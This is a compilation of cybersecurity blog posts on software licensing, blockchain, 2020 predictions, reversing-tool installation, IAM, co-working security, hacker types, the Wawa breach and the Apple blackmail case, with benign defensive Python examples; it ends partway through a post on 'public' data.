It could and it does. Open-source software is definitely getting a lot of attention and for a very good reason – even though OSS is free, it’s extremely reliable and tends to take quite a beating when subjected to repeated reverse-engineering. And, on top of that, OSS software, compared to freeware and shareware, is much more secure.

Open-source software is amazing simply because it’s out there and can potentially be molded into anything you like. However, it’s not the Holy Grail of enterprise software, nor does it want to be. OSS is scalable, dependable, and, in all cases, it’s made by an experienced computer engineer who isn’t necessarily motivated by money. Don’t get me wrong – shareware-type software is also developed by experienced people, but on the sample-now-buy-full-later basis.

As an enterprise, you should also consider the support aspect. If something goes terribly wrong with the software, there’s no one out there to help.

Well, that’s not entirely correct; there’s an entire community of experts out there willing to give you a helping hand, but that means hours upon hours of digging through forums, asking questions, and praying for someone to come up with the right answer. This perspective is not exactly compatible with an enterprise’s credo.

So, do we have a winner here? I would say that it’s a tie: open-source is dependable, flexible, and scalable, but low on support and could incur unforeseen costs, especially when you try to use it for purposes other than those it was designed for. On the other hand, shareware holds an abundant database but falls short as far as long-term commitment goes.

Freeware vs. shareware vs open source

Now that we have all the pieces of the puzzle, it’s easier to figure out which is the best enterprise-grade solution.

Let’s start with freeware.

Major advantages – it’s free, easy to install, and can solve any number of issues. On the other hand, disadvantage-wise, the freeware pool is very limited and can only address a handful of issues. Freeware would best be used on home machines. Add to that its questionable compatibility, no support of any kind, and the fact that most of it is obsolete, and it’s safe to assume that freeware and enterprises just don’t mix.

Shareware – an entire database, laid down at your feet. Plenty of possibilities, but is shareware the answer to your company’s needs? It’s just a matter of how you look upon the problem: if it’s a one-time thing, then you should definitely consider deploying shareware on a couple of machines.

There’s no need to concern yourself with the trial period, as long as you can solve the task or tasks in one go. Just bear in mind that some apps will revert to basic functions or stop working altogether after a certain number of uses. Of course, if the app suits your needs, you can always activate the full version by buying the license.

Open-source – dependable, can easily be taken apart in any IDE, and free to use. Do bear in mind that OSS can come with hidden costs and is harder to get used to compared to shareware or license-based software. If you encounter issues along the way, you can always ask the dev community for help. Just don’t expect the answer to be as prompt as in the case of an app that offers round-the-clock support.

In the end, it’s all up to you to decide which one clicks with your company’s needs.

Cybersecurity issues and safety tips

Tackling non-license-based software should come with a warning label. Up next, I’ll be discussing the risks of using shareware, freeware, and open-source software. I will also include some cybersecurity tips along the way.

1. Adware also means malware

If you plan on using shareware, pay extra attention to apps that rely on ad-generated revenue. Some of them may contain links to malicious websites that could seriously harm your machine. If you do click on an ad, at least check the site’s security certificate, though I advise you not to click at all.

2. Fake apps

Some applications advertised as freeware could be fake. Don’t download the first app you find on Google. Take your time and do some research. You would do well to stay away from websites that use too many CTAs and “free download” buttons. It’s like playing Russian Roulette with your personal data.

3. Freeware used as a malware entry point

As you know, outdated and unpatched software can be used by malicious hackers to circumvent your antivirus\antimalware solution. Since freeware does not receive regular security patches, it can become an entry point for malware.

4. Strengthen your cyber-defenses

When all else fails, ensure that you have a good antivirus\antimalware solution. Thor Premium Enterprise, our product that incorporates two of our award-winning technologies (Thor Foresight Enterprise and Thor Vigilance Enterprise) will ensure that no malware lands on your machine, by continuously scanning your outbound and inbound traffic, severing any malicious C&C connection it detects.


Companies, regardless of their size and needs, can also benefit from freeware, shareware, and open-source software. It’s all about figuring out your needs and selecting the solution that makes the most sense. As always, if you have any questions, feel free to send me a message.

The post Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely appeared first on Heimdal Security Blog.

How can blockchain enable better data security for enterprises?


NASA recently announced a proposal to explore the possibility of using blockchain to improve the cybersecurity of its current air traffic management systems. It was a powerful statement from one of the world’s most well-known organizations and a strong endorsement of blockchain which has the potential to change how business is conducted, worldwide.

To understand its power, it is important to understand what blockchain actually is — it is a type of ledger containing records arranged in data blocks that use cryptographic validation to link together. Blockchain is a database with built-in validation where all transactions are recorded and confirmed anonymously.

Decentralization for greater security

A key differentiating point about blockchain is that it is distributed and exists on multiple systems at the same time. Importantly, the information entered cannot be altered. Each user needs a private, cryptographically created key to access only the blocks they own. In this way, the ledger cannot be manipulated as no one can edit a blockchain without having the corresponding keys.

It is this decentralization that could revolutionize cybersecurity. The principle of blockchain technology is that there is no centralized authority or storage location – in conventional information systems, attackers can target such a central point to inflict maximum damage. In a blockchain, each transaction is verified against the entire network, and each transaction must be verified cryptographically. This ultimately means that an entire database is not at risk in the event of a major vulnerability, mainly because it is distributed across different nodes, unlike a conventional setup.

Benefits of blockchain technology

While research into blockchain continues, more and more companies are exploring how blockchain could benefit their enterprise security. Two key ways are:

A lower percentage of DDoS attacks

Distributed denial of service (DDoS) attacks occur when an attacker launches multiple, continuous attacks on a server until it is overwhelmed and collapses. However, the very decentralization which is at the heart of blockchain technology could enable a lower percentage of DDoS attacks on enterprises. The information would be distributed across a large number of nodes, ensuring there is no single point of vulnerability.

Better data protection

Enterprises have to be much more careful about the way they handle customer data considering the new wave of data protection laws across the world. Blockchain technology could ensure better protection of data, thanks to its inbuilt protection mechanisms. Data is cryptographically secured with unique keys and distributed across multiple devices. Each node has a copy of the entire blockchain, and every new update is synchronized to all nodes with its details recorded. Hence, any attempt to delete data or insert false data can be immediately detected.
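As an added example (not code from the Seqrite post), here is the hash-chained ledger described above, together with the two checks the article relies on: each node validates its own copy, and compares it against a peer’s copy so that an edited or deleted record is detected. The records and the "honest node" versus "tampered node" copies are constructed for illustration.

```python
"""Minimal hash-chained ledger with tamper detection (added example)."""
import hashlib
import json
from dataclasses import dataclass, field
from typing import List, Optional

GENESIS_PREV = "0" * 64  # the first block links to an all-zero hash


@dataclass
class Block:
    index: int
    prev_hash: str
    data: str
    hash: str = field(default="")

    def compute_hash(self) -> str:
        # The hash covers the index, the previous block's hash and the payload,
        # so changing any of them changes this hash and breaks the next link.
        payload = json.dumps(
            {"index": self.index, "prev_hash": self.prev_hash, "data": self.data},
            sort_keys=True,
        )
        return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def make_chain(records: List[str]) -> List[Block]:
    """Build a chain where every block carries the hash of the one before it."""
    chain: List[Block] = []
    prev = GENESIS_PREV
    for i, rec in enumerate(records):
        block = Block(index=i, prev_hash=prev, data=rec)
        block.hash = block.compute_hash()
        chain.append(block)
        prev = block.hash
    return chain


def find_first_invalid(chain: List[Block]) -> Optional[int]:
    """Local validation: index of the first block whose stored hash or
    backward link is wrong, or None when the whole copy is consistent."""
    expected_prev = GENESIS_PREV
    for i, block in enumerate(chain):
        if (block.index != i
                or block.prev_hash != expected_prev
                or block.hash != block.compute_hash()):
            return i
        expected_prev = block.hash
    return None


def diverges_from(local: List[Block], peer: List[Block]) -> Optional[int]:
    """Network validation: first index at which two copies disagree.
    A deleted tail block shows up as a length mismatch."""
    for i, (a, b) in enumerate(zip(local, peer)):
        if a.hash != b.hash:
            return i
    if len(local) != len(peer):
        return min(len(local), len(peer))
    return None


def rewrite_block(chain: List[Block], idx: int, new_data: str) -> None:
    """Alter one record and recompute every hash after it, the way a single
    compromised node would try to make its own copy look self-consistent."""
    chain[idx].data = new_data
    prev = chain[idx].prev_hash
    for block in chain[idx:]:
        block.prev_hash = prev
        block.hash = block.compute_hash()
        prev = block.hash


if __name__ == "__main__":
    # Constructed sample ledger entries.
    records = ["alice->bob:10", "bob->carol:4", "carol->dave:1"]
    honest = make_chain(records)

    # Case 1: naive edit, hashes not recomputed -> local check fails at block 1.
    naive = make_chain(records)
    naive[1].data = "bob->carol:400"
    print("naive edit, first invalid block:", find_first_invalid(naive))

    # Case 2: edit with recomputed hashes -> local check passes, but the
    # honest peers' copies disagree from block 1 onward.
    crafty = make_chain(records)
    rewrite_block(crafty, 1, "bob->carol:400")
    print("crafty edit, local check:", find_first_invalid(crafty))
    print("crafty edit, diverges from honest copy at:", diverges_from(honest, crafty))

    # Case 3: deleting the last record -> detected by length mismatch.
    truncated = make_chain(records[:2])
    print("deleted tail, diverges at:", diverges_from(honest, truncated))
```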

With many companies exploring the power of blockchain for cybersecurity and other functions, it is quite clear that the technology has a long future. Enterprises must continue to explore ways in which they can unlock the power of blockchain to enable greater cybersecurity.

The post How can blockchain enable better data security for enterprises? appeared first on Seqrite Blog.

Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020

2019 is virtually over and a new year beckons with all the solemnity of the grim reaper for those who don’t have their eyes wide open to the persistent threats we collectively face in the areas of privacy and cybersecurity. 

Now that I have your attention, I’d like to add that it’s not all bad news. In the main, consumers and business leaders alike are more aware of cybersecurity and privacy than ever before. However, this sea change has been met with innovation on the criminal side of things. As defenses improve, the attack vectors become more nuanced and technically impressive. At times it can seem like a war of attrition, which brings us to the first series of predictions for 2020:

  1. CISOs will get worse at their jobs. Okay, simmer down all you cybersecurity people. I just mean there will be a shortage of experts–i.e., fewer of you to go around because at this moment in history everyone understands that a good CISO is critical to the ongoing success of an enterprise (the 2019 IBM Cost of Data Breach study found that the average cost to an organization was $3.92 million). With the demand for cybersecurity professionals far exceeding supply, the market will start having openings for less qualified people. Water finds its level, but it will be rough for a while. 
  2. The disinformation blob will grow. With what we experienced in 2016 and 2018, is there any doubt there will be a rise in disinformation–homegrown and imported–of all stripe in the upcoming elections? Since these weaponized misinformation campaigns have proven effective, expect to see more of them in the private sector, with businesses adopting troll farm tricks to hurt the competition–or rather waiting to be discovered by intrepid reporters like Brian Krebs.
  3. Ransomware will continue to thrive. As long as humans are, well… human, phishing attacks will lead to ransomware infecting more and more networks, and businesses, municipalities and other organizations will continue to pay whatever they must in order to regain control of their data and systems. We will also see better backup practices that will help minimize or neutralize the threat of these attacks.
  4. IoT botnets will make dystopian paranoia seem normal. IoT will continue to grow exponentially. In 2020 there will be somewhere around 20 billion IoT devices in use around the world. Unfortunately, many are not secure because they are protected by nothing more than manufacturer default passwords readily available online. They will be weaponized (as in years past) but with increasing skill and computing power.
  5. The integrity of the US elections will be questioned–and for good reason. There are still voting machines in use that are far from secure, and would not pass the most simple audits. Some states continue to use machines that leave no paper trail. Look forward to questions regarding election security all year. 
  6. Cryptocurrency miners will continue to get rich off of stolen electricity. Related to the botnet craze, we will see an increase in computing power theft used to mine cryptocurrency. With bots becoming exponentially more effective as the result of AI and cloud computing, we will see a renaissance of Wild West behavior in the world’s cryptomines.  
  7. Zero trust environments will be talked about. A few may exist. The assumption that one can trust the home team–people within one’s organization–sort of went the way of the Dodo bird when Edward Snowden walked away from the NSA carrying a treasure trove of NSA data hidden in a Rubik’s Cube. Zero trust simply means that no one can be trusted, in or outside the organization. With this assumption foremost, new systems make breaches and compromises harder to happen. Stay tuned.
  8. More people will know what “protect surface” means. Protect surface is part of the zero-trust environment. An organization’s attackable surface includes every error-prone human in its employ as well as the mistakes in configuration they may have committed along the way and a whole constellation of other issues. The protect surface is much smaller and must be kept out of harm’s way. The more we talk about subjects like protect surface, the stronger our cybersecurity will be.
  9. Cars will be frozen. Or not. But actually, yes. I think it will happen. Driverless cars are going to hit things as well as get hit. Cars that talk to satellites are toast. It’s going to happen. (Or not. But it totally could.)
  10. 5G will make the cyber smash-and-grab a thing. 5G is going to make everything move fast, as will the new generation of USB4 devices. With quicker speed, it will take much less time to transfer data. Coincidentally, criminals appreciate this as much as the rest of us.
  11. Social media will no longer need to be private. Social media companies will probably become a bit more responsible when it comes to the way they gather, store, crunch, analyze and sell our data to marketing companies and small to medium sized businesses looking to connect directly with consumers. This is really not worth talking about, however, because all of our information has already been scooped up. It’s good news for 2020 babies. 
  12. State-sponsored traffic jams will be a thing. The hackers who brought you Hillary’s emails and who probably have President Trump’s tax returns are going to target operational systems with an array of tactics that include ransomware and more DDoS attacks that will snarl things up in ways we’ve not yet seen. The targets will be financial institutions, the power grid, an election, a company’s secret sauce, a city’s traffic lights or, you can fill in the blank.
  13. You’re going to have personal cyber insurance. Insurance companies will be writing more comprehensive cyber liability policies for businesses and offering innovative personal cyber coverage for consumers.
  14. HR will save money by spending some. More employers will offer their employees identity protection products and services as part of their paid or voluntary benefits programs. (An employee who has their identity stolen is not very productive and if, as part of that identity theft, their USER ID or passwords are exposed, a thief might have what he or she needs to access an employer’s network and sensitive databases.)
  15. The cloud will leak. The parade of stories about misconfigured cloud clients and data stored without any password protection on cloud services will continue apace, perhaps in part because of the CISO issue discussed in the first prediction. 
  16. AI will gladly take your job. The Yang Gang knows it’s true. AI is here and it’s willing to work so that you can go fishing, collect that monthly $1,000 and not make ends meet. In all seriousness, the CISO shortage as well as many of the innovations discussed in this list of predictions will be increasingly powered by Artificial Intelligence. 

2020 promises to be an interesting ride. Buckle up, because that driverless car might be hacked along the way. As ever, you are your best guardian when it comes to your privacy and personal cybersecurity. Be smart. Stay safe. And, have a very happy, healthy holiday season. 



The post Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020 appeared first on Adam Levin.

Reversing and Exploiting with Free Tools: Part 1

Pen testing is a dynamic process that requires practitioners to exploit an environment to expose security weaknesses. In order to do this safely and efficiently, pen testers enlist the help of different tools. This article series will focus on reversing and exploiting Windows using free and easy-to-get tools, such as IDA FREE, Radare, WinDbg, x64dbg, or Ghidra.

We’ll begin with tool installation. From there, we’ll explore vulnerability theory, and then conclude with some examples of exploitation.


First, let’s install the tools to set up our work environment.




Download the file idafree70_windows. Follow the installer instructions to get IDA FREE running on your machine quickly.






Download the latest installer for Windows.



Once installation has finished just include the path where radare was installed into the environment variables.



Inside of the environment variables, go to the variable path and include these two lines (write your own paths if installed elsewhere):





Windows should now recognize the command radare2 when prompted.






Download the zip file and decompress it wherever you want. For example, you could use a Virtual Machine in VMWARE.

Once the tool is decompressed, install Java from the Oracle webpage. GHIDRA recommends version 11 for compatibility. Once the installer has finished, include the Java path where the java executable is located (usually the bin path) in the PATH environment variable, as seen before.

Alternatively, other users of GHIDRA recommend version 11 of OpenJDK.




While installing with the OpenJDK installer, it’s possible to automatically add it to the variable PATH:



Once Java is installed in your environment, you can begin to run GHIDRA.



Click the bat file, and GHIDRA will boot up:




There are new snapshots of x64dbg almost every day. Go to the SourceForge web page and install the latest version:



Once you have  unzipped the file, move it to the release folder:



When you run it with administrator privileges, a launcher appears for you to choose which version you would like to run or if you want to install the debugger in the system:




Snowman was originally part of x64dbg. Now it’s a plugin we can download and install, which will decompile our binaries. Download it and copy it inside the plugins folder.



The 32-bit version goes in the 32-bit plugins folder, and the 64-bit version goes in the 64-bit plugins folder.




If you have Windows 10, to install WinDbg you just have to go to the Microsoft Store and search for WinDbg.



WinDbg Preview will install automatically. If you have Windows 7, you’ll have to install a previous version.

Here are some older versions:



Next step, configure symbols for WinDbg: create the folder symbols in “C:\”, then go to environment variables and create the variable _NT_SYMBOL_PATH.



As value write:


With this, WinDbg Preview is installed and configured.




This free hexadecimal editor will allow you to edit binary files.




The newest version of Python 3 will help create the exploits for each exercise.



Download the latest version.

Find and select the option in the installer to add python.exe to the PATH environment variable automatically.

Usually the installation path will be:


Python38 may be different in your case.

Once installed, you should be able to execute Python as needed.




PyCharm will be our Integrated Development Environment (IDE) for Python. Go to the JetBrains web page and select the latest version.




Select all of the above options, so it will be included in PATH environment variable. Once installed, create a new project:



Check the RUN->DEBUG configuration and verify that the “Base interpreter” option points to the correct Python interpreter.



Search in settings for ”project interpreter” and check that the correct version of Python is detected.



This will allow you to convert files to python and move them into Pycharm.



For example, pepe.txt has been converted into When you click  “Run,” the next screen should appear:



The PyCharm console should print:



PyCharm features autocomplete. For instance, if you point with the mouse to the word “os” and Ctrl-click, PyCharm should take you to the code of the “os” Python library.



Now that you’ve installed the right tools for our exploiting environment, you’re ready to move on to part two, which will begin with a little bit of theory about buffer overflows. From there, you’ll complete a few simple exercises.

Continue to part two >>

Author: Ricardo Narvaja
What Is IAM Security?


Identity and Access Management (IAM) security is an essential part of overall IT security that manages digital identities and user access to data, systems, and resources within an organization. IAM security includes the policies, programs, and technologies that reduce identity-related access risks within a business. IAM programs enable organizations to mitigate risks, improve compliance, and increase efficiencies across the enterprise.

What Are the Benefits of IAM Security?

IAM is a cybersecurity best practice and ensures greater control of user access. By identifying, authenticating, and authorizing users, while prohibiting unauthorized ones, IAM security improves the efficiency and effectiveness of access management throughout the business.

Enhance Security and Mitigate Risks

A recent study found that 50 percent of organizations indicate identity and access management programs are the most effective security tool to protect against insider threats, while 75 percent of organizations that use identity and access management solutions saw a reduction of unauthorized access incidents. Overseeing appropriate access through the right IAM security framework goes a long way towards bolstering an organization’s risk management and security posture.

When managing access within the organization, IAM security also ensures that users have only the access privileges required for their job. Without it, bulk approvals of access requests, frequent changes in roles and departments, and the lack of a process for access reviews contribute to excessive access privileges, which opens the organization to insider threats and magnifies risk throughout the business.
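The failure mode described above, entitlements that survive a role change because nobody reviews them, is easy to detect mechanically once a role-to-entitlement baseline exists. The following is an added example, not code from the original page or any IAM product: it compares each user's current entitlements with the baseline for their role and flags the excess, separating out entitlements that belong to a role the user used to hold. The roles, entitlement strings and users are constructed for illustration.

```python
"""Added example: a minimal entitlement (access) review.

All data here is constructed. ROLE_BASELINE maps each job role to the
entitlements it is supposed to carry; the entitlement strings are assumed
labels, not any real product's model.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed baseline: what each role should hold.
ROLE_BASELINE: Dict[str, Set[str]] = {
    "engineer": {"repo:read", "repo:write", "ci:run"},
    "finance": {"ledger:read", "ledger:post"},
    "support": {"tickets:read", "tickets:write", "customer:read"},
}


@dataclass
class User:
    name: str
    role: str
    entitlements: Set[str] = field(default_factory=set)
    previous_roles: List[str] = field(default_factory=list)


def review_user(user: User) -> dict:
    """Compare what the user holds with what their current role allows."""
    expected = ROLE_BASELINE.get(user.role, set())
    excess = user.entitlements - expected
    missing = expected - user.entitlements
    # Excess entitlements that belong to a role the user previously held:
    # the classic "role changed, old access never revoked" drift.
    carried_over = {
        e for e in excess
        if any(e in ROLE_BASELINE.get(r, set()) for r in user.previous_roles)
    }
    return {
        "user": user.name,
        "excess": sorted(excess),
        "carried_over": sorted(carried_over),
        "missing": sorted(missing),
        "needs_review": bool(excess),
    }


def run_review(users: List[User]) -> List[dict]:
    """Review every user; anything with needs_review=True goes to the approver."""
    return [review_user(u) for u in users]


# Constructed sample population.
SAMPLE_USERS = [
    User("alice", "engineer", {"repo:read", "repo:write", "ci:run"}),
    # bob moved from engineering to finance but kept his old repo/CI access.
    User("bob", "finance", {"ledger:read", "ledger:post", "repo:write", "ci:run"},
         previous_roles=["engineer"]),
    # carol holds a finance entitlement her support role never included.
    User("carol", "support", {"tickets:read", "customer:read", "ledger:post"}),
]

if __name__ == "__main__":
    for result in run_review(SAMPLE_USERS):
        print(result)
```

In practice the baseline comes from the identity governance system and the held entitlements from each target system's export; the review output is what an approver signs off or revokes.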

Increase Operational Efficiencies

IAM security empowers organizations to do more with less. Many security teams today are understaffed and overextended, but are expected to manage and protect increasing numbers of devices, data, users, and systems. By leveraging IAM programs to automate and streamline access management, organizations can boost operational efficiencies. One study found that 49 percent of organizations view operational efficiency as an IAM program driver.

Improve Compliance

As regulatory compliance and industry mandates like SOX, HIPAA, and GDPR have become more stringent and more complex in recent years, organizations face more auditing, compliance reviews, and mandatory reporting. IAM security solutions that automate data collection, reporting, and access reviews enable companies to limit access to only those individuals who need it and stay compliant with industry standards. By leveraging strategic IAM security policies, organizations can ensure data is strictly controlled and prove they are taking proactive steps to meet ongoing compliance requirements.

What Are Effective IAM Security Tools?

Organizations today typically use leading IAM security tools from best-of-breed solution partners, from identity governance solutions to privileged access management to access intelligence tools, offered on premises, in the cloud, or in a hybrid model. These tools make up the technology solutions that support the overall IAM security framework and are essential in establishing a solid foundation for identity and access management.


Ready to learn more best practices around IAM Security?

 Download the Identity and Access Management Report today to find out how other companies are leveraging IAM security in their business.

Top tech stories of 2019

The new Apple Card, the battle for cryptocurrency dominance, cybersecurity skills shortage – just a few of the stories that made headlines in 2019. Watch as IDG TECH(talk) hosts Ken Mingis and Juliet Beauchamp discuss the top tech stories of the year.

How Organizations Can Defend Against Advanced Persistent Threats

Advanced persistent threats (APTs) have emerged to be legitimate concerns for all organizations. APTs are threat actors that breach networks and infrastructures and stealthily lurk within them over extended spans of time. They typically perform complex hacks that allow them to steal or destroy data and resources. According to Accenture, APTs have been organizing themselves into groups that

Cybersecurity And Privacy for a Co-Working Space

The way we work and the spaces we work in have evolved considerably in the last fifty years. Corporate culture is nothing like what it was in the 80s and 90s. Cabins and cubicles have given way to open offices. Many in the workforce today prefer to work remotely and keep flexible hours, so hot-desking is common in many multinational companies, including those with large office spaces. As start-up culture evolved, there was a need for many small offices. This growing breed of self-employed professionals and start-up owners also needs the resources commonly found in an office environment, like printers, shredders, Wi-Fi, meeting rooms and video-conferencing, and a common place to meet people, network and exchange ideas, because working solo can become monotonous. Co-working provides an all-in-one solution for such individuals and small groups: a common space where equipment and utilities are shared between the businesses that rent it. Co-working spaces have thus become very popular across the world, especially in cities where real estate is expensive. According to statistics, the number of co-working spaces increased by 205% between 2014 and 2018.

In any business, however, security is paramount. Corporate espionage is very much a reality for small businesses, which are very often the breeding ground for great ideas and innovations. Co-working spaces are a melting pot of unrelated people, some of whom cannot really be trusted. It is therefore necessary that, when sharing space, equipment and utilities, users do not unknowingly end up sharing information and trade secrets as well. Ensuring data privacy and cyber security in a shared office can be difficult, but it can be achieved by laying down ground rules and ensuring that everyone follows them. The following are some security best practices for a co-working space.

  1. Ensuring network security: While shared Wi-Fi access is probably the most popular and most heavily used service a co-working space provides, it is also the most exposed from a cyber security perspective. The following practices help secure Wi-Fi access for all users.
    1. Having a dedicated administrator who ensures that networks are set up correctly and securely. This person can also liaise with users to ensure that they follow the guidelines.
    2. Setting strong passwords for every network and changing them regularly. On a network protected by a single shared password, rotating it is the only way to cut off former members who still know it.
    3. Setting up a separate network and access page for every business using the space, plus a separate network for guests, so that one tenant's devices cannot see another's.

  2. Securing smart devices: IoT has put network connectivity into everyday devices like TVs, refrigerators, coffee machines and printers, and a co-working space may have many such devices on its network. A compromised device can be used as a foothold into the Wi-Fi network, and a compromised network can be used to reach the devices. It is therefore necessary to secure these devices by keeping their firmware updated and their hardware physically tamper-resistant. Every device that can connect to the network, including laptops and phones, should be password protected and should not be left unlocked or unattended.

  3. Blocking websites: It is best to block known-malicious websites that are not likely to do anyone any good. Corporate offices have long taken this step to prevent unwanted traffic and protect the network and its data. There is no reason why co-working spaces cannot offer this as a service.

  4. Vetting users: Co-working spaces may run a minimum background check on users to ensure that they fit in with the business culture of the space and will not disrupt the normal functioning of other users in any way.

  5. Physical monitoring: Physical monitoring using cameras helps ensure that users do not try to steal data or equipment that does not belong to them. Issuing physical access cards, logging users' entry and exit times and installing cameras all contribute to the overall security of the space.


While these guidelines are general, they should be useful to both co-working space operators and users, and give an idea of what to look out for and how to protect private data and intellectual property.



The post Cybersecurity And Privacy for a Co-Working Space appeared first on CyberDB.

Black Hat Hackers & White Hat Hackers – The Sequel

Estimated reading time: 2 minutes

Thanks to popular culture, the image of a hacker has become a stereotype: a criminal using advanced cyber techniques to infiltrate enterprises or systems with the intention of causing mayhem. It is an image carefully cultivated by movies and books, to the extent that many people may not be aware that there is more to it than the popular stereotype.

At its most basic, hacking refers to bypassing security measures to get into a computer, device or network. The individuals who do this are called hackers; however, not all hackers are cybercriminals.

Sometimes, organizations may even reward hackers to infiltrate their systems.

Surprised? Read on as we add on to our previous blog on the same topic.

The White Hat hacker

The white-hat hacker is a form of external audit used, and even favoured, by many organizations. Thanks to their specialized knowledge of breaking into systems, white hat hackers are often more intimately aware of the flaws in an enterprise's cybersecurity posture than the in-house security teams. Since white hat hackers do this for a living, they can spot vulnerabilities and loopholes in systems that may not be visible from within the organization.

White hat hackers are employed by many organizations across the world to test their security defences. Seqrite offers Red Team Assessments as a service: mock attacks conducted by highly trained security professionals who attempt to breach an organization, to test how well its people, processes and technology hold up to a real cyberattack. Red Team Assessments were recently recommended by the Reserve Bank of India (RBI), India's central banking institution, which endorsed such assessments for financial institutions.

The major difference between white hat and black hat hackers is that the former enters an organization's systems with the organization's full consent and knowledge. White hat hackers are not motivated by malice but by a genuine desire to help enterprises iron out their cybersecurity flaws.

The Black Hat hacker

The black hat hacker is the cybercriminal that enterprises worry about. Like white hat hackers, they are professionals with in-depth knowledge of how to identify loopholes in an organization's cybersecurity framework and use them to penetrate and attack. Unlike white hat hackers, they are motivated not by good intentions but by malice.

Black hat hackers are cybercriminals because they have malicious motives for attacking businesses. The motives vary, from stealing confidential data and selling it on the dark web to simply creating chaos within an organization. In many cases, even script kiddies with little experience use ready-made software to conduct hacking attacks or run Distributed Denial of Service (DDoS) attacks to bring an organization to its knees.

However, enterprises know that the key to dealing with black hat hackers is to maintain a strong security solution that closes vulnerabilities and calls out suspicious user behaviour when it happens. Seqrite offers a range of security solutions for the enterprise, providing protection against hackers and other threats. Whether it is endpoint security or an integrated threat management solution for the network, enterprises can depend on Seqrite for their cybersecurity protection.

The post Black Hat Hackers & White Hat Hackers – The Sequel appeared first on Seqrite Blog.

Data Breach Compromises Payment Card Info At Wawa Stores

Convenience store and gas station chain Wawa informed customers of a data breach that compromised payment card information at most of its 842 locations.

In an announcement released December 19, Wawa CEO Chris Gheysens stated that the company's information security team had discovered malware on its payment processing servers about a week earlier. The malware had been active since March 4, 2019, meaning that payment card information, including credit and debit card numbers, expiration dates, and cardholder names, used over the preceding nine months may have been compromised.

“This malware affected customer payment card information used at potentially all Wawa locations beginning at different points in time after March 4, 2019 and until it was contained,” stated Gheysens.

While Wawa specified that payment card security codes weren’t compromised in the breach, security experts have pointed out that they ultimately offer little protection in the face of a large-scale data breach. While a three or four digit code may be cumbersome for a human to guess, “[t]o a machine, it’s nothing,” said cybersecurity expert Matt Wilson to Philadelphia Magazine.

The exact nature of the malware used to breach Wawa's payment card processing systems hasn't been made public, but it was apparently able to capture card data despite the chip-based (EMV) cards in use and to remain unnoticed on the company's systems for nine months.

Wawa is offering a year of free identity protection and credit monitoring to affected customers. 

The post Data Breach Compromises Payment Card Info At Wawa Stores appeared first on Adam Levin.

North London hacker sentenced for blackmailing Apple

On Friday, a British citizen was sentenced for attempting to blackmail Apple by claiming he held a massive trove of iCloud and other Apple account data.

The man, 22-year-old Kerem Albayrak from North London, contacted Apple Security claiming he had access to the account details of millions of iCloud users. He demanded that Apple pay him a ransom of $75,000 in bitcoin, or a thousand $100 iTunes gift cards, in return for deleting the data.

Albayrak told Apple Security on March 12, 2017 that if the company refused to pay, he would sell the database online and factory reset devices associated with 319 million iCloud accounts.

A week later, a video showing him accessing two apparently random iCloud accounts was posted on YouTube, and the link was sent to Apple and multiple media organizations.

Two days after that, he announced that the demand had increased to $100,000 and that, once Apple met it, he would delete the iCloud data he held.

The Cupertino-based tech company approached law enforcement in both the U.S. and the U.K.

The National Cyber Crime Unit of the UK's National Crime Agency (NCA) arrested the man at his home in North London on March 28, 2017 and seized various devices, including his phone, laptops and a hard drive.

During its inquiry the NCA found that Albayrak was acting as spokesman for a hacking group calling itself the “Turkish Crime Family.” Police verified Apple's conclusion that no breach of its network had occurred; the data Albayrak claimed to possess was mostly inactive credentials from previously compromised third-party services.

Albayrak pleaded guilty to one count of blackmail at the beginning of December. Earlier, he had admitted two counts of unauthorised acts “with the purpose of impairing or hindering the activity of a computer access,” the NCA said.

On Friday, Albayrak was given a two-year suspended prison sentence, 300 hours of unpaid work, and a six-month electronic curfew.

“Albayrak wrongly believed he could escape justice after hacking in to two accounts and attempting to blackmail a large multi-national corporation. During the investigation, it became clear that he was seeking fame and fortune. But cyber-crime doesn’t pay,” said Anna Smith, a senior investigative officer for the NCA.


When Is Data “Public”? (And 2.5M Public Factual Records in HIBP)


When is data "public"? And what does "public" even mean? Does it mean it's merely visible to the public? Or does it mean the public can do anything they like with it? This discussion comes up time and time again, as it did with the huge leak of PDL data only last month. For the most part, the impacted data in that incident came from LinkedIn, a service where by design we (myself included) publish personal information about ourselves for public consumption. So what's the problem? Willingly publishing your personal data online in a specific context is one thing; an organisation then taking it and presenting it in another context is... unsettling:

As I said in the intro to the PDL blog post, the pattern of data being collected by data aggregators and then redistributed outside their control (whether you call it a "leak", a "spill" or a "breach") is becoming alarmingly common. So when someone recently sent me an alleged breach titled "factual.com_places_db_8M", it wasn't overly surprising. Factual is "a location data company that helps marketers and their organizations use location to better understand, reach and engage consumers". They were mentioned in the recent New York Times piece titled Twelve Million Phones, One Dataset, Zero Privacy, which is an absolutely fascinating story. To be fair to Factual, that story puts them on higher moral ground than many of their peers, and there are certainly many shades of grey in the ethics under which data aggregators operate.

Moving on, the data allegedly sourced from Factual included a 1.1GB CSV file which contained fields for name, email, country, region, locality, address, postcode, latitude, longitude, tel, fax and website. The create date on the file was 22 March 2017. As the filename suggests, there were almost 8M records although "only" 2.5M unique email addresses (many records didn't include this field). For the most part, the data fell into the "public" category insofar as I'd expect to be able to go and locate much of it on a record-per-record basis, yet there's also the question of whether it should exist in one aggregated location in the first place and whether the owners of the data expected it to be used in this fashion. So I asked people; I emailed a handful of the near 3M subscribers I have in HIBP who appeared in the data set and I asked them 3 questions:

  1. Is this data about you accurate?
  2. Do you consider it to be public domain info that should be redistributed?
  3. Should it appear in HIBP?

On the first point, responses varied:

It is not accurate
It appears to me that all of the information below is publicly available either on our website or job postings currently.
The data is not accurate and most is fake
Yes, I was a travelling notary at one time.
I don’t work for [redacted] and that is not my phone number or address. The only thing correct was my name, email and website.

I found these responses interesting from the perspective of how reliable services from aggregators really are. With the caveat that I have zero insight into where Factual actually gets their data from, I would imagine that large scale aggregation from public sources would be fraught with data integrity challenges. Be that as it may, we're still talking about millions of people's email addresses popping up in unexpected places, which brings me to the responses to the second question about whether this data should be online in this fashion:
